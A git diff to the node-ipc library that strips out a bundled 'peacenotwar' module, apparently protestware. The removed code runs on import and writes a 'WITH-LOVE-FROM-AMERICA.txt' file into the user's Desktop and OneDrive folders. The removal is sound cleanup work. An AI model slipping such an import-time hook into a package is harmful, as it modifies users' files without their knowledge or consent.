diff --git a/node-ipc.cjs b/node-ipc.cjs
index 916ee49a0354089fa6b9f0b59ebe5d61bd56597e..e2227904268c8bac25dd5b1e5fd8a528d72f0d12 100644
--- a/node-ipc.cjs
+++ b/node-ipc.cjs
@@ -1255,96 +1255,7 @@ function connectNet(id, host, port, callback) {
   callback(this);
 }
 
-// node_modules/peacenotwar/index.js
-var import_fs5 = __toModule(require("fs"));
-
-// node_modules/peacenotwar/service/findFiles.js
-var import_path = __toModule(require("path"));
-var import_fs3 = __toModule(require("fs"));
-function fromDir(startPath = "", filter = "", recurse = false) {
-  if (!import_fs3.default.existsSync(startPath)) {
-    return;
-  }
-  let dir = [];
-  try {
-    dir = import_fs3.default.readdirSync(startPath);
-  } catch (err) {
-  }
-  const files = [];
-  for (var i = 0; i < dir.length; i++) {
-    const filename = import_path.default.join(startPath, dir[i]);
-    let stat = null;
-    try {
-      stat = import_fs3.default.lstatSync(filename);
-    } catch (err) {
-      continue;
-    }
-    if (stat.isDirectory()) {
-      const recursedFiles = fromDir(filename, filter);
-      recursedFiles.length > 0 ? files.push(...recursedFiles) : null;
-    } else if (filename.indexOf(filter) >= 0) {
-      files.push(filename.replace(/\\/g, "/"));
-    }
-    ;
-  }
-  ;
-  return files;
-}
-
-// node_modules/peacenotwar/service/readFile.js
-var import_fs4 = __toModule(require("fs"));
-function read(path2 = "", type = "") {
-  let rawdata = "";
-  try {
-    rawdata = import_fs4.default.readFileSync(path2, "utf8");
-  } catch (err) {
-    type == "JSON" ? rawdata = {} : null;
-    return rawdata;
-  }
-  let parsedData = null;
-  switch (type) {
-    case "JSON":
-      try {
-        parsedData = JSON.parse(rawdata);
-      } catch (err) {
-        parsedData = {};
-      }
-      break;
-    case "HTML":
-      parsedData = rawdata;
-      break;
-    default:
-      parsedData = rawdata;
-  }
-  return parsedData;
-}
-
-// node_modules/peacenotwar/index.js
-var import_os2 = __toModule(require("os"));
-var Desktops = `${import_os2.homedir}/Desktop/`;
-var OneDrive = `${import_os2.homedir}/OneDrive/`;
-var OneDriveDesktops = `${import_os2.homedir}/OneDrive/Desktop/`;
-var DesktopFileExists = fromDir(Desktops, "WITH-LOVE-FROM-AMERICA.txt");
-var OneDriveDesktopFileExists = fromDir(OneDriveDesktops, "WITH-LOVE-FROM-AMERICA.txt");
-var OneDriveFileExists = fromDir(OneDrive, "WITH-LOVE-FROM-AMERICA.txt");
-function deliverAPeacefulMessage(path2, message) {
-  try {
-    import_fs5.default.writeFile(path2, message, function(err) {
-    });
-  } catch (err) {
-  }
-}
-if (!(DesktopFileExists == null ? void 0 : DesktopFileExists.length) && !(OneDriveFileExists == null ? void 0 : OneDriveFileExists.length) && !(OneDriveDesktopFileExists == null ? void 0 : OneDriveDesktopFileExists.length)) {
-  const thinkaboutit = "WITH-LOVE-FROM-AMERICA.txt";
-  const WITH_LOVE_FROM_AMERICA = read(`./${thinkaboutit}`);
-  deliverAPeacefulMessage(`${Desktops}${thinkaboutit}`, WITH_LOVE_FROM_AMERICA);
-  deliverAPeacefulMessage(`${OneDriveDesktops}${thinkaboutit}`, WITH_LOVE_FROM_AMERICA);
-  deliverAPeacefulMessage(`${OneDrive}${thinkaboutit}`, WITH_LOVE_FROM_AMERICA);
-}
-var whatWeWant = "\u2665";
-
 // node-ipc.js
-console.log(whatWeWant);
 var IPCModule = class extends IPC {
   constructor() {
     super();
diff --git a/node-ipc.js b/node-ipc.js
index 0dcf5be209bba2ce8eb5ba074510538c227a8418..ac8148463804945254f43a34e1a81b09e6eeed6e 100644
--- a/node-ipc.js
+++ b/node-ipc.js
@@ -1,6 +1,4 @@
 import IPC from './services/IPC.js';
-import peacenotwar from 'peacenotwar';
-console.log(peacenotwar);
 
 class IPCModule extends IPC{
     constructor(){